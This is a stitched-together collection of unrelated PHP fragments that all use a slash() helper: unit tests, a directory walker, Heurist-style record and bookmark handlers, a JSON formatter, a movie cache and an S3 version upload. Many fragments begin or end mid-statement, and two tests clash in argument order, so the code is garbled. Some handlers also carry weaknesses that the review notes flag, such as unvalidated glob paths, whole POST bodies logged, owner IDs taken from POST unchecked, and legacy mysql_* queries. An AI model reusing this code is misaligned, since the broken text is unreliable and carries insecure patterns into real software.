/**
 * Checks slash() against a small table of inputs and expected results.
 *
 * The expectations pin down three things about slash() as exercised here:
 * a value that already ends in "/" comes back unchanged, a missing trailing
 * "/" is appended, and a run of trailing slashes collapses to exactly one.
 * A leading slash is neither added nor removed.
 */
function testSlash()
{
    // Each row is array(expected result, input handed to slash()).
    $cases = array(
        array('foobar/', 'foobar/'),
        array('/foobar/', '/foobar/'),
        array('/foobar/', '/foobar'),
        array('/foobar/', '/foobar///'),
    );

    foreach ($cases as $case) {
        list($expected, $input) = $case;
        $this->assertEquals($expected, slash($input));
    }
}
/**
 * Checks slash() against a small table of inputs and expected results.
 *
 * This variant uses the harness's equals(actual, expected) helper, so the
 * slash() result is passed first. The cases cover an already-terminated
 * path, a missing trailing "/", and a run of trailing slashes that must
 * collapse to one.
 */
function testSlash()
{
    // Each row is array(input handed to slash(), expected result).
    $cases = array(
        array('foobar/', 'foobar/'),
        array('/foobar/', '/foobar/'),
        array('/foobar', '/foobar/'),
        array('/foobar///', '/foobar/'),
    );

    foreach ($cases as $case) {
        list($input, $expected) = $case;
        $this->equals(slash($input), $expected);
    }
}
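/**
 * Collects the files matching $filter from each sub-directory of $path.
 *
 * For every sub-directory that is not ignored and holds at least one matching
 * file, one entry is appended to $result:
 *   array('DIR' => <directory>, 'FILES' => array(<file>, ...))
 * Both values have $_SERVER['DOCUMENT_ROOT'] replaced by "/" and are passed
 * through slash() (file entries with a second argument of false; its meaning
 * is defined by slash(), not here). Files lying directly in $path are not
 * listed; only its sub-directories are scanned.
 *
 * NOTE(review): $path and $filter are concatenated straight into glob()
 * patterns, so wildcards or "../" in either one widen what gets listed.
 * Nothing in this function confines the walk to DOCUMENT_ROOT; confirm that
 * callers never pass request-derived values without validating them first.
 *
 * @param string $path      Directory whose sub-directories are scanned.
 * @param string $filter    glob() pattern applied inside each sub-directory.
 * @param bool   $recursive Whether to descend into nested sub-directories.
 * @param array  $result    Output list, appended to in place.
 * @param mixed  $ignore    Passed unchanged to ignored(); its format is defined there.
 * @return bool true on completion; false only if a recursive call reports false.
 */
function getDir($path, $filter, $recursive, &$result, $ignore)
{
    // glob() returns false on error; treat that the same as "nothing found".
    $dirs = glob($path . '/*', GLOB_ONLYDIR);
    if (!$dirs) {
        $dirs = array();
    }

    foreach ($dirs as $dir) {
        if ($dir == '.' || $dir == '..' || ignored($dir, $ignore)) {
            continue;
        }

        // Start a fresh list for every directory. Without this the list was
        // never initialised, and files found in an earlier sibling directory
        // were reported again under each later one.
        $files = array();

        $matches = glob($dir . '/' . $filter);
        if (!$matches) {
            $matches = array();
        }
        foreach ($matches as $file) {
            if (ignored($file, $ignore)) {
                continue;
            }
            $files[] = slash(str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file), false);
        }

        if (count($files) > 0) {
            $result[] = array(
                'DIR' => slash(str_replace($_SERVER['DOCUMENT_ROOT'], '/', $dir)),
                'FILES' => $files,
            );
        }

        if ($recursive && getDir($dir, $filter, $recursive, $result, $ignore) === false) {
            return false;
        }
    }

    return true;
}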
return true; } }; <?php } $res = mysql_query("select usr.ugr_ID, usr.ugr_Name, concat(usr.ugr_FirstName, ' ', usr.ugr_LastName) as fullname\n\t\tfrom " . USERS_DATABASE . ".sysUGrps usr\n\t\twhere usr.ugr_Enabled='y' and usr.ugr_FirstName is not null and usr.ugr_LastName is not null and !usr.ugr_IsModelUser\n\torder by fullname"); print " top.HEURIST.allUsers = {\n"; $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\"" . $row[0] . "\":\t[ \"" . slash($row[1]) . "\", \"" . slash($row[2]) . "\" ]"; } print " };\n"; ?> top.HEURIST.is_registration_allowed = <?php echo defined('HEURIST_ALLOW_REGISTRATION') && HEURIST_ALLOW_REGISTRATION ? "true" : "false"; ?> ; top.HEURIST.is_logged_in = function() { return <?php echo intval(is_logged_in()); ?> > 0; }; top.HEURIST.get_user_id = function() { return <?php
?> , email: "<?php echo slash($rem["rem_ToEmail"]); ?> ", message: "<?php echo slash($rem["rem_Message"]); ?> ", when: "<?php echo slash($rem["rem_StartDate"]); ?> ", frequency: "<?php echo slash($rem["rem_Freq"]); ?> " } }) <?php } } else { if ($rec_id && $rem_id && $_POST["save-mode"] == "delete") { $res = mysql_query("delete from usrReminders where rem_ID={$rem_id} and rem_RecID={$rec_id} and rem_OwnerUGrpID=" . get_user_id()); if (!mysql_error()) { print "1"; } else { print "({ error: \"Internal database error - " . mysql_error() . "\" })"; } }
/**
 * Applies the posted edit form to one record and its recDetails rows.
 *
 * The current details are loaded and compared with $_POST so that the change
 * can be split into updates, inserts and deletes (needed for versioning).
 * Everything runs inside one transaction, which is committed only when at
 * least one row was actually changed.
 *
 * Security-relevant behaviour visible in this function:
 *  - Edit permission is decided by the first query: the record must have no
 *    owner group, be owned by the current user, or be owned by a group the
 *    user is linked to.
 *  - Changing owner or visibility is additionally gated on is_admin() or
 *    record ownership.
 *  - The complete $_POST array is written to the PHP error log several times.
 *
 * NOTE(review): the mysql_* extension used throughout was removed in PHP 7.0,
 * and join() with the array as first argument was removed in PHP 8.0.
 *
 * @param int   $recID ID of the record to update (forced to int below).
 * @param mixed $rtyID Record type ID, passed through to the input handler's inputOK().
 * @return bool|null true when changes were committed, false when nothing changed and the
 *                   transaction was rolled back, no value when the permission check fails
 *                   (an error object is printed instead).
 */
function updateRecord($recID, $rtyID = null)
{
    // Update the given record.
    // This is non-trivial: so that the versioning stuff (archive_*) works properly
    // we need to separate this into updates, inserts and deletes.
    // We get the current record details and compare them against the post;
    // if the detail id is in post[dtyID][dtlID] then compare the values.

    // Forced to int because it is interpolated into every query below.
    $recID = intval($recID);

    // Check that the user has permissions to edit it.
    // The join on sysUsrGrpLinks can yield several rows; only the first is read later.
    $res = mysql_query("select * from Records" . " left join sysUsrGrpLinks on ugl_GroupID=rec_OwnerUGrpID" . " left join defRecTypes on rty_ID=rec_RecTypeID" . " where rec_ID={$recID} and (! rec_OwnerUGrpID or rec_OwnerUGrpID=" . get_user_id() . " or ugl_UserID=" . get_user_id() . ")");
    if (mysql_num_rows($res) == 0) {
        // No row means "not permitted" or "no such record"; both end up here.
        // For a missing record mysql_fetch_row() returns false and the group name is empty.
        $res = mysql_query("select grp.ugr_Name from Records, " . USERS_DATABASE . ".sysUGrps grp where rec_ID={$recID} and grp.ugr_ID=rec_OwnerUGrpID");
        $grpName = mysql_fetch_row($res);
        $grpName = $grpName[0];
        // slash() is defined elsewhere; presumably it escapes the name for the
        // JavaScript string literal it is embedded in. TODO confirm.
        print '({ error: "\\nSorry - you can\'t edit this record.\\nYou aren\'t in the ' . slash($grpName) . ' workgroup" })';
        return;
    }
    $record = mysql_fetch_assoc($res);

    // DEBUG
    // NOTE(review): this writes the whole request body, including free-text notes and
    // field values, to the server log. Remove or redact before production use.
    error_log("save record dtls POST " . print_r($_POST, true));

    // Upload any files submitted ... (doesn't have to take place right now, but may as well)
    uploadFiles(); // Artem: it does not work here, since we uploaded files at once

    // Get the existing record details and compare them to the incoming data
    $recDetails = getRecordDetails($recID);

    // find UPDATES - everything that is in the current record and has a post value is treated as an update
    $recDetailUpdates = array();
    foreach ($recDetails as $dtyID => $dtlIDs) {
        $eltName = "type:" . $dtyID;
        if (!(@$_POST[$eltName] && is_array($_POST[$eltName]))) {
            // element wasn't in POST: ignore it - this could be a non-rectype detail
            unset($recDetails[$dtyID]); // remove from details so it's not deleted
            continue;
        }
        if (count($_POST[$eltName]) == 0) {
            // element was in POST but without content: values have been deleted client-side
            // (they need to be deleted in the DB, so leave them in $recDetails)
            continue;
        }
        $bdInputHandler = getInputHandlerForType($dtyID); // handler (processor) for the given field type
        foreach ($dtlIDs as $dtlID => $val) {
            $eltID = "bd:" . $dtlID;
            // The stored value is discarded; from here on $val is the posted value.
            $val = @$_POST[$eltName][$eltID];
            if (!$bdInputHandler->inputOK($val, $dtyID, $rtyID)) {
                continue; // faulty input ... ignore
            }
            $toadd = $bdInputHandler->convertPostToMysql($val);
            // Loose comparison: an empty array, "" or 0 from the handler is skipped as well as null.
            if ($toadd == null) {
                continue;
            }
            $recDetailUpdates[$dtlID] = $toadd;
            $recDetailUpdates[$dtlID]["dtl_DetailTypeID"] = $dtyID;
            /*
            @TODO Since this function is utilized in (email)import we need to add verification
            of values according to detail type, at first for terms (enumeration field type)
            */
            unset($_POST[$eltName][$eltID]); // remove data from post submission
            if (count($_POST[$eltName]) == 0) {
                // if nothing is left in post for this dtyID then remove it also
                unset($_POST[$eltName]);
            }
            unset($recDetails[$dtyID][$dtlID]); // remove data from local reflection of the database
        }
    }

    // find DELETES
    // Anything left in recDetails now represents recDetails rows that need to be deleted.
    // The IDs collected here are array keys returned by getRecordDetails(), not request input.
    $bibDetailDeletes = array();
    foreach ($recDetails as $dtyID => $dtlIDs) {
        foreach ($dtlIDs as $dtlID => $val) {
            array_push($bibDetailDeletes, $dtlID);
        }
    }

    // find INSERTS
    // Try to insert anything left in POST as new recDetails rows
    $bibDetailInserts = array();
    // DEBUG - second full dump of the request body into the log, see the note above.
    error_log(" in saveRecord checking for inserts _POST =" . print_r($_POST, true));
    foreach ($_POST as $eltName => $bds) {
        // if not properly formatted or empty or an empty array then skip it
        // NOTE(review): "$" also matches before a trailing newline, so "type:12\n" passes;
        // the detail type ID taken from it below is then not purely numeric.
        if (!preg_match("/^type:\\d+\$/", $eltName) || !$_POST[$eltName] || count($_POST[$eltName]) == 0) {
            continue;
        }
        $dtyID = substr($eltName, 5);
        $bdInputHandler = getInputHandlerForType($dtyID);
        foreach ($bds as $eltID => $val) {
            if (!$bdInputHandler->inputOK($val, $dtyID, $rtyID)) {
                continue; // faulty input ... ignore
            }
            $newBibDetail = $bdInputHandler->convertPostToMysql($val);
            $newBibDetail["dtl_DetailTypeID"] = $dtyID;
            $newBibDetail["dtl_RecID"] = $recID;
            array_push($bibDetailInserts, $newBibDetail);
            unset($_POST[$eltName][$eltID]); // remove data from post submission
        }
    }

    // Anything left in POST now is stuff that we have no intention of inserting ... ignore it
    // We now have:
    //  - $recDetailUpdates: an assoc. array of dtl_ID => column values to be updated in recDetails
    //  - $bibDetailInserts: an array of column values to be inserted into recDetails
    //  - $bibDetailDeletes: an array of dtl_ID values corresponding to rows to be deleted from recDetails

    // Commence versioning ...
    mysql_query("start transaction");

    // The array("now()") form is interpreted by mysql__update(), which is defined elsewhere.
    $recUpdates = array("rec_Modified" => array("now()"), "rec_FlagTemporary" => 0);
    // Read without an existence check; the duplicate-line clean-up further down runs
    // after this assignment, so the value saved here is the raw posted text.
    $recUpdates["rec_ScratchPad"] = $_POST["notes"];
    if (intval(@$_POST["rectype"])) {
        $recUpdates["rec_RecTypeID"] = intval($_POST["rectype"]);
    }
    if (array_key_exists("rec_url", $_POST)) {
        $recUpdates["rec_URL"] = $_POST["rec_url"];
    }
    $owner = $record['rec_OwnerUGrpID'];
    if (is_admin() || is_admin('group', $owner) || $owner == get_user_id()) {
        // must be grpAdmin or record owner to change ownership or visibility
        // NOTE(review): both values are taken from POST as-is. Escaping is left to
        // mysql__update() (not visible here), and nothing in this function checks that the
        // new owner is a group the user may assign or that the visibility is an allowed value.
        if (array_key_exists("rec_owner", $_POST)) {
            $recUpdates["rec_OwnerUGrpID"] = $_POST["rec_owner"];
        }
        if (array_key_exists("rec_visibility", $_POST)) {
            $recUpdates["rec_NonOwnerVisibility"] = $_POST["rec_visibility"];
        } else {
            // An edited public record drops back to 'pending' when the installation asks for it.
            if ($record['rec_NonOwnerVisibility'] == 'public' && HEURIST_PUBLIC_TO_PENDING) {
                $recUpdates["rec_NonOwnerVisibility"] = 'pending';
            }
        }
    }
    // DEBUG
    error_log(" in saveRecord update recUpdates = " . print_r($recUpdates, true));
    mysql__update("Records", "rec_ID={$recID}", $recUpdates);
    $biblioUpdated = mysql_affected_rows() > 0 ? true : false;
    // Errors are only logged; execution continues and may still reach the commit below.
    if (mysql_error()) {
        error_log("error rec update" . mysql_error());
    }

    $updatedRowCount = 0;
    foreach ($recDetailUpdates as $bdID => $vals) {
        // DEBUG
        error_log(" in saveRecord update details dtl_ID = {$bdID} value =" . print_r($vals, true));
        // The extra dtl_RecID condition keeps an update from touching another record's detail row.
        mysql__update("recDetails", "dtl_ID={$bdID} and dtl_RecID={$recID}", $vals);
        if (mysql_affected_rows() > 0) {
            ++$updatedRowCount;
        }
    }
    // NOTE(review): mysql_error() reports the most recent statement only, so a failure
    // in an earlier loop iteration is lost when a later one succeeds.
    if (mysql_error()) {
        error_log("error detail updates" . mysql_error());
    }

    $insertedRowCount = 0;
    foreach ($bibDetailInserts as $vals) {
        // DEBUG
        error_log(" in saveRecord insert details detail =" . print_r($vals, true));
        mysql__insert("recDetails", $vals);
        if (mysql_affected_rows() > 0) {
            ++$insertedRowCount;
        }
    }
    if (mysql_error()) {
        error_log("error detail inserts" . mysql_error());
    }

    $deletedRowCount = 0;
    if ($bibDetailDeletes) {
        // DEBUG
        error_log(" in saveRecord delete details " . print_r($bibDetailDeletes, true));
        mysql_query("delete from recDetails where dtl_ID in (" . join($bibDetailDeletes, ",") . ") and dtl_RecID={$recID}");
        if (mysql_affected_rows() > 0) {
            $deletedRowCount = mysql_affected_rows();
        }
    }
    if (mysql_error()) {
        error_log("error detail deletes" . mysql_error());
    }

    // eliminate any duplicated lines
    // The result is written back to $_POST only; rec_ScratchPad was already saved above.
    $notesIn = explode("\n", str_replace("\r", "", $_POST["notes"]));
    $notesOut = "";
    $notesMap = array();
    for ($i = 0; $i < count($notesIn); ++$i) {
        if (!@$notesMap[$notesIn[$i]] || !$notesIn[$i]) { // preserve blank lines
            $notesOut .= $notesIn[$i] . "\n";
            $notesMap[$notesIn[$i]] = true;
        }
    }
    $_POST["notes"] = preg_replace("/\n\n+/", "\n", $notesOut);

    if ($updatedRowCount > 0 || $insertedRowCount > 0 || $deletedRowCount > 0 || $biblioUpdated) {
        /* something changed: update the record's title and commit all changes */
        $title_check = check_title_mask2($record["rty_TitleMask"], $record["rec_RecTypeID"], true);
        if ($title_check != '') {
            $new_title = "Please go to Designer View > Essentials > Record types/fields and edit the title mask for this record type";
        } else {
            $new_title = fill_title_mask($record["rty_TitleMask"], $record["rec_ID"], $record["rec_RecTypeID"]);
        }
        // NOTE(review): addslashes() is not aware of the connection character set;
        // mysql_real_escape_string() is the escaping function that belongs to this extension.
        mysql_query("update Records\n set rec_Title = '" . addslashes($new_title) . "'\n where rec_ID = {$recID}");
        mysql_query("commit");
        // Update memcached's copy of record (if it is cached)
        updateCachedRecord($recID);
        return true;
    } else {
        /* nothing changed: rollback the transaction so we don't get false versioning */
        mysql_query("rollback");
        return false;
    }
}
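/**
 * Builds region and city lookup tables from lists/lists_cities.php.
 *
 * The included file is expected to define $cities, a list of regions where
 * each region is array(array(name_en, name_ar), array(array(city_en, city_ar), ...)).
 * The result has two maps, both keyed by strtolower(slash(<English region name>)):
 *   'region' => region name in the requested language
 *   'city'   => that region's cities
 *
 * NOTE(review): the require path is relative, so it is resolved through the
 * include path and working directory of the calling script.
 *
 * @param string|null $wanted_region Top-level key to return ('region' or 'city'); null returns both.
 * @param string      $lang          'en' or 'ar'; any other value now falls back to English.
 * @param bool        $select        When true, cities are keyed by strtolower(slash(<English name>))
 *                                   and lower-cased; otherwise they form a plain list.
 * @return array|null The requested map(s), or null when $wanted_region is not a key of the result.
 */
public static function city_list($wanted_region = null, $lang = 'en', $select = false)
{
    // Column 0 holds the English names and column 1 the Arabic ones. Previously an
    // unsupported $lang left the index undefined and every name came back null.
    $lang_index = $lang == 'ar' ? 1 : 0;

    require "lists/lists_cities.php";

    $res = [];
    foreach ($cities as $region) {
        $region_key = strtolower(slash($region[0][0]));

        // Fresh list per region, so the variable is always defined, even for a region without cities.
        $cities_array = [];
        foreach ($region[1] as $city) {
            if ($select) {
                $cities_array[strtolower(slash($city[0]))] = strtolower($city[$lang_index]);
            } else {
                $cities_array[] = $city[$lang_index];
            }
        }

        $res['region'][$region_key] = $region[0][$lang_index];
        $res['city'][$region_key] = $cities_array;
    }

    if ($wanted_region != null) {
        // An unknown key yields null without raising an undefined-index notice.
        return isset($res[$wanted_region]) ? $res[$wanted_region] : null;
    }

    return $res;
}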
} mysql__update("usrBookmarks", "bkm_ID={$bkm_ID} and bkm_UGrpID={$usrID}", $updates); $res = mysql_query("select " . join(", ", array_keys($updates)) . " from usrBookmarks where bkm_ID={$bkm_ID} and bkm_UGrpID={$usrID}"); if (mysql_num_rows($res) == 1) { $dbVals = mysql_fetch_assoc($res); $hVals = array(); foreach ($dbVals as $colName => $val) { $hVals[$updatable[$colName][1]] = $val; } if ($tagString !== NULL) { $hVals["tagString"] = $tagString; } print "(" . json_format($hVals) . ")"; } else { if ($tagString !== NULL) { print "({tagString: \"" . slash($tagString) . "\"})"; } } } function doTagInsertion($bkm_ID) { global $usrID; //translate bmkID to record IT $res = mysql_query("select bkm_recID from usrBookmarks where bkm_ID={$bkm_ID}"); $rec_id = mysql_fetch_row($res); $rec_id = $rec_id[0] ? $rec_id[0] : null; if (!$rec_id) { return ""; } $tags = mysql__select_array("usrRecTagLinks, usrTags", "tag_Text", "rtl_RecID={$rec_id} and tag_ID=rtl_TagID and tag_UGrpID={$usrID} order by rtl_Order, rtl_ID"); $tagString = join(",", $tags);
if ($bibID && $bdtID) { mysql_query("update Records set rec_Modified=now() where rec_ID={$bibID}"); mysql_query("insert into recDetails (dtl_RecID, dtl_DetailTypeID, dtl_UploadedFileID) values ({$bibID}, {$bdtID}, {$fileID})"); } $file = get_uploaded_file_info($fileID, false, false); print json_format($file); /*({ file: { // saw TODO: update this to include url or nonce and thumbURL id: "<?= $file["ulf_ID"] ?>", origName: "<?= slash($file["ulf_OrigFileName"]) ?>", date: "<?= slash($file["ulf_Added"]) ?>", mimeType: "<?= slash($file["ulf_MimeExt"]) ?>", nonce: "<?= slash($file["ulf_ObfuscatedFileID"]) ?>", fileSize: "<?= slash($file["ulf_FileSizeKB"]) ?>", description: "<?= slash($file["ulf_Description"]) ?>" } })*/ } else { if ($fileID) { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: {$fileID} })"; } else { if ($_FILES["file"]["error"]) { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: \"Uploaded file was too large\" })"; } else { print "({ file: { origName: \"" . slash($_FILES["file"]["name"]) . "\" }, error: \"File upload was interrupted\" })"; } } } ?> </script> </head> <body onload="fireParentSubmitFunction()"></body> </html>
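/**
 * Renders a PHP value as a JSON-style string.
 *
 * Scalars: null, booleans and strings are returned as text; integers and
 * floats are returned unchanged as numbers (callers concatenate them).
 * Arrays for which isZeroBasedOrderedArray() is true become "[...]"; every
 * other array or object becomes "{...}" with quoted keys.
 *
 * NOTE(review): string safety depends entirely on slash(), which is defined
 * elsewhere. Where the result is printed inside an inline <script> block,
 * slash() must also neutralise "</script>" and line terminators. Confirm
 * that, or move callers to json_encode() with
 * JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT.
 * NOTE(review): non-finite floats (NAN, INF) are passed through and do not
 * form valid JSON; count() on a non-Countable object throws on PHP 8.
 *
 * @param mixed   $obj   variable to convert to JSON
 * @param boolean $purdy whether to put a newline after each comma at this level
 *                       (nested values are always rendered compactly)
 * @return string|int|float JSON description of the supplied variable/object
 */
function json_format($obj, $purdy = false)
{
    // Primitive scalar types
    if (!is_array($obj) && !is_object($obj)) {
        if ($obj === null) {
            return "null";
        }
        if (is_bool($obj)) {
            return $obj ? "true" : "false";
        }
        if (is_integer($obj) || is_float($obj)) {
            return $obj;
        }
        return '"' . slash($obj) . '"';
    }

    if (count($obj) == 0) {
        return "[]";
    }

    $separator = $purdy ? ",\n" : ",";
    $parts = array();

    if (isZeroBasedOrderedArray($obj)) {
        // Has a "0" element ... we'll call it an array.
        // Joining with implode() fixes the old "add a comma if the buffer is truthy"
        // test, which dropped the comma after a leading 0 ("[01]" instead of "[0,1]").
        foreach ($obj as $val) {
            $parts[] = json_format($val);
        }
        return "[" . implode($separator, $parts) . "]";
    }

    // Do object output
    foreach ($obj as $key => $val) {
        // Only keys made of digits alone skip slash(); \z (unlike $) rejects a trailing newline.
        if (preg_match('/^\\d+\\z/', $key)) {
            $parts[] = "\"" . $key . "\"" . ":" . json_format($val);
        } else {
            $parts[] = "\"" . slash($key) . "\":" . json_format($val);
        }
    }
    return "{" . implode($separator, $parts) . "}";
}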
/**
 * Returns the actor, genre and franchise lists for the movie catalogue.
 *
 * The result is served from the cache entry "genres_actors" when present.
 * Otherwise it is rebuilt from movies_model and stored with a lifetime of
 * 4320 (the unit is whatever this framework version's Cache::add() uses).
 *
 * NOTE(review): the "players" column is decoded with json_decode() and its
 * "actors" / "actor" members go straight into array_merge(); a row where
 * either member is not an array will raise an error there.
 *
 * @return array with keys 'actors', 'genres' and 'franch'
 */
public function movies_info()
{
    if (\Cache::has('genres_actors')) {
        return \Cache::get('genres_actors');
    }

    $model = new \movies_model();

    // Merge the cast lists of every movie into one de-duplicated list.
    $actors = [];
    foreach ($model->where('id', '>', 0)->lists('players') as $encoded) {
        $decoded = json_decode($encoded);
        foreach (['actors', 'actor'] as $field) {
            if (isset($decoded->{$field}) && $decoded->{$field}) {
                $actors = array_unique(array_merge($decoded->{$field}, $actors));
            }
        }
    }

    // Group franchise entries under the slash()-processed franchise name, oldest first.
    $rows = $model->where('franchises', '!=', '')->orderBy("year", "asc")->get(['franchises', 'link_id']);
    $grouped = [];
    foreach ($rows as $row) {
        $grouped[slash($row->franchises)][] = ["franch" => $row->franchises, "id" => $row->link_id];
    }

    // The grouped map is wrapped in a one-element list, so this sort leaves it as it is.
    $franch = [$grouped];
    sort($franch);
    sort($actors);

    $genres = \movies_model::lists('genre')->unique()->sort();

    $data = [
        'actors' => $actors,
        'genres' => $genres,
        'franch' => $franch,
    ];
    \Cache::add('genres_actors', $data, 4320);

    return $data;
}
$Error->blank($_POST['human_version'], 'Human Readable Version Number'); $Error->upload($_FILES['file'], 'file'); if ($Error->ok()) { $v = new Version(); $v->app_id = $app->id; $v->version_number = $_POST['version_number']; $v->human_version = $_POST['human_version']; $v->release_notes = $_POST['release_notes']; $v->dt = dater(); $v->downloads = 0; $v->filesize = filesize($_FILES['file']['tmp_name']); $v->signature = sign_file($_FILES['file']['tmp_name'], $app->sparkle_pkey); $object = strtolower(preg_replace('/[^a-zA-Z0-9]/', '', $app->name)) . "_" . $v->version_number . "." . substr($_FILES['file']['name'], -3); $v->url = slash($app->s3path) . $object; $info = parse_url($app->s3path); $object = ltrim(slash($info['path']) . $object, '/'); chmod($_FILES['file']['tmp_name'], 0755); $s3 = new S3($app->s3key, $app->s3pkey); $s3->uploadFile($app->s3bucket, $object, $_FILES['file']['tmp_name'], true); $v->insert(); redirect('versions.php?id=' . $app->id); } else { $version_number = $_POST['version_number']; $human_version = $_POST['human_version']; $release_notes = $_POST['release_notes']; } } else { $version_number = ''; $human_version = ''; $release_notes = ''; }
$updates["cmt_Deleted"] = true; } mysql__update("recThreadedComments", "cmt_ID={$cmt_id} and cmt_OwnerUgrpID=" . get_user_id(), $updates); if (mysql_error()) { $error = mysql_error(); } $res = mysql_query("select * from recThreadedComments left join " . USERS_DATABASE . ".sysUGrps usr on cmt_OwnerUgrpID=usr.ugr_ID where cmt_ID={$cmt_id} and ! cmt_Deleted"); $cmt = mysql_fetch_assoc($res); } else { if ($rec_id) { // ADD NEW COMMENT TO RECORD $inserts = array("cmt_Text" => $_POST["text"], "cmt_Added" => array("now()"), "cmt_OwnerUgrpID" => get_user_id(), "cmt_RecID" => $rec_id); if ($owner) { $inserts["cmt_ParentCmtID"] = $owner; } mysql__insert("recThreadedComments", $inserts); if (mysql_error()) { $error = mysql_error(); } $query = "select * from recThreadedComments left join " . USERS_DATABASE . ".sysUGrps usr on cmt_OwnerUgrpID=usr.ugr_ID where cmt_ID=" . mysql_insert_id(); $res = mysql_query($query); $cmt = mysql_fetch_assoc($res); } } if (@$error) { print "({ error: \"" . slash($error) . "\" })"; } else { if (@$cmt) { print "({ comment: " . json_format(array("id" => $cmt["cmt_ID"], "text" => $cmt["cmt_Text"], "owner" => $cmt["cmt_ParentCmtID"], "user" => $cmt["ugr_FirstName"] . ' ' . $cmt["ugr_LastName"], "userID" => $cmt["cmt_OwnerUgrpID"], "deleted" => false)) . " })"; } }
} $colNames = array("rec_ID", "rec_Title", "rec_URL", "rec_RecTypeID"); $query = REQUEST_to_query("select " . join(", ", $colNames) . " ", BOTH); if (@$_REQUEST["r"] == "recent") { $query = preg_replace("/\\swhere\\s/", " where (TOPBIBLIO.rec_RecTypeID!=1) AND " . "(TOPBIBLIO.rec_ID in (select distinct rre_RecID from usrRecentRecords where rre_UGrpID = " . get_user_id() . ")) and ", $query); // saw CHECK ME: this code assumes order by is last clause of query $query = preg_replace("/(.*)\\sorder by.*/", "\$1 order by TOPBIBLIO.rec_Modified desc", $query); } else { $query = preg_replace("/\\swhere\\s/", " where (TOPBIBLIO.rec_RecTypeID!=1) AND ", $query); } $query .= " limit {$limit}"; header("Content-type: text/javascript"); ?> ({ "searchID": "<?php echo slash($searchID); ?> ", "colNames": [ "<?php echo join("\", \"", $colNames); ?> " ], "records": [ <?php $res = mysql_query($query); $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ",\n"; }
$res = mysql_query("select * from Records where rec_ID = {$rec_id}"); $bib = mysql_fetch_assoc($res); if (!$bib) { print "{ error: \"invalid record ID - {$rec_id}\" }"; return; } /* check workgroup permissions */ if (array_key_exists("rec_OwnerUGrpID", $bib) && $bib["rec_OwnerUGrpID"] != $usrID && $bib["rec_OwnerUGrpID"] != 0 && $bib["rec_NonOwnerVisibility"] == "hidden") { /*****DEBUG****/ // error_log("select ugl_GroupID from ".USERS_DATABASE.".sysUsrGrpLinks where ugl_UserID=$usrID and ugl_GroupID=" . intval($bib["rec_OwnerUGrpID"])); $res = mysql_query("select ugl_GroupID from " . USERS_DATABASE . ".sysUsrGrpLinks " . "where ugl_UserID={$usrID} and ugl_GroupID=" . intval($bib["rec_OwnerUGrpID"])); if (!mysql_num_rows($res)) { $res = mysql_query("select grp.ugr_Name from " . USERS_DATABASE . ".sysUGrps grp where grp.ugr_ID=" . $bib["rec_OwnerUGrpID"]); $grp_name = mysql_fetch_row($res); $grp_name = $grp_name[0]; print "{ error: \"record is restricted to workgroup " . slash($grp_name) . "\" }"; return; } } /* check -- maybe the user has this bookmarked already ..? */ $res = mysql_query("select * from usrBookmarks where bkm_recID={$rec_id} and bkm_UGrpID={$usrID}"); if (mysql_num_rows($res) == 0) { /* full steam ahead */ mysql_query("insert into usrBookmarks (bkm_recID, bkm_UGrpID, bkm_Added, bkm_Modified) values (" . $rec_id . ", {$usrID}, now(), now())"); $res = mysql_query("select * from usrBookmarks where bkm_ID=last_insert_id()"); if (mysql_num_rows($res) == 0) { print "{ error: \"internal database error while adding bookmark\" }"; return; } $bkmk = mysql_fetch_assoc($res); $tagString = "";
/**
 * Joins the values of an array into one string, optionally transforming each value first.
 *
 * NOTE(review): a non-array argument ends the whole request with die() and
 * an HTML fragment; callers cannot recover from it.
 *
 * @param array       $array     Values to join; keys are ignored in the output.
 * @param string      $delemeter Separator placed between values.
 * @param string|null $func      'slash' applies slash(), 'unslash' applies u(unslash());
 *                               anything else leaves the values untouched.
 * @return string
 */
function arr_to_str($array, $delemeter = "/", $func = null)
{
    if (!is_array($array)) {
        die('<h1>arr_to_str() says: it isn\'s an array...</h1>');
    }

    $pieces = [];
    foreach ($array as $key => $val) {
        // switch compares loosely, exactly like the == checks it replaces.
        switch ($func) {
            case 'slash':
                $pieces[$key] = slash($val);
                break;
            case 'unslash':
                $pieces[$key] = u(unslash($val));
                break;
            default:
                $pieces[$key] = $val;
        }
    }

    return implode($delemeter, $pieces);
}
print '({ "error": "User unauthorised to fetch workgroup data for workgroup ' . $wg_id . '" })'; return; } ?> { "members": [<?php $res = mysql_query("select usr.ugr_ID, concat(usr.ugr_FirstName,' ',usr.ugr_LastName) as name, usr.ugr_eMail\n\t\t\t\t\t from " . USERS_DATABASE . ".sysUsrGrpLinks\n\t\t\t\t left join " . USERS_DATABASE . ".sysUGrps usr on usr.ugr_ID = ugl_UserID\n\t\t\t\t\t where usr.ugl_GroupID = " . $wg_id . "\n\t\t\t\t\t and usr.ugr_Enabled = 'y'\n\t\t\t\t order by usr.ugr_LastName"); $first = true; while ($row = mysql_fetch_row($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\t{ \"id\": " . slash($row[0]) . ", \"name\": \"" . slash($row[1]) . "\", \"email\": \"" . slash($row[2]) . "\" }"; } ?> ], "savedSearches": [ <?php $res = mysql_query("select svs_Name, ss_url, ss_url not like '%w=bookmark%' as w_all\n\t\t\t\t\t from usrSavedSearches\n\t\t\t\t\t where svs_UGrpID=" . $wg_id . "\n\t\t\t\t order by svs_Name"); $first = true; while ($row = mysql_fetch_assoc($res)) { if (!$first) { print ","; } print "\n"; $first = false; print "\t\t[ \"" . addslashes($row['svs_Name']) . "\", \"" . addslashes($row['ss_url']) . "\", 0, " . intval($row['w_all']) . " ]";
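/**
 * Creates a relationship record linking two records, plus its detail rows.
 *
 * A row is inserted into Records with a title built from $title and the
 * looked-up source title, relation label and target title. When the DT_*
 * constants are defined, the matching recDetails rows are inserted in one
 * statement.
 *
 * The four ID parameters are forced to integers because they are placed into
 * SQL as bare numbers; the text parameters go through
 * mysql_real_escape_string().
 *
 * NOTE(review): the owner group is taken from $_REQUEST['rec_owner'] without
 * any check here that the current user may assign records to that group;
 * confirm the caller enforces it.
 * NOTE(review): $userDefaultOwnerGroupID is never set or imported in this
 * function, so that branch of the owner fallback cannot be taken.
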